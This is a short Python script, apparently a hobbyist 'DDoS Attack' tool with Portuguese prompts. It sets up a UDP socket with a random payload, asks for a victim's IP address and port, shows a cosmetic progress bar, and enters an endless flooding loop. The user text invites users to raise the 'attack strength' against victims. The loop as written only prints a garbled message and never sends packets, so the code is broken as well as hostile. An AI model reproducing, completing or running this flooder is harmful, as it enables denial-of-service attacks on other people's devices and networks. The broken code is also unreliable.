from colorama import Fore,Back,Style
import sys
import os
import time
import socket
import random
#Code Time
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year

##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############
os.system("clear")
os.system("figlet DDos Attack")
print
'''Author: Aikon
You Tube : https://www.youtube.com/channel/UCCgy7i_A5yhAEdY86rPOinA
github: https://github.com/Ha3MrX
Facebook : https://www.facebook.com/muhamad.jabar222'''

print(Fore.LIGHTMAGENTA_EX+"Atenção,  eu estou colocando nessa tool 10% de força no ataque,  o motivo é que,  se eu colocasse uma porcentagem maior,  o seu celular iria travar, e não só o da vitima,  Você pode aumentar a porcentagem para 100% caso você esteja usando um computador,  afinal,  no computador não trava... use com sabedoria  e  responsabilidade    :)  ")

print
ip = input(Fore.LIGHTBLUE_EX+"IP da vitima  : ")
port = input(Fore.LIGHTBLUE_EX+"Porta       : ")

os.system("clear")
os.system("figlet Attack Starting")
print ("[                    ] 0% ")
time.sleep(2)
print ("[..               ] 2%")
time.sleep(1)
print ("[===          ] 17%")
time.sleep(0.3)
print ("[====               ] 25%")
time.sleep(0.3)
print ("[======             ] 29%")
time.sleep(0.5)
print ("[==================  ] 97%")
time.sleep(2)
print ("[====================] 100%")
time.sleep(5)
print(Fore.LIGHTMAGENTA_EX+"""
coded by:                            
●●●                  
●  ●                 
●   ●              
●    ●            
●AIKON●               
●      ●        
●       ●        
●        ●          
 """)
sent = 0
while True:
      print ("Sent 10%s packet to 99%s throught port:3%s"%(sent,ip,port))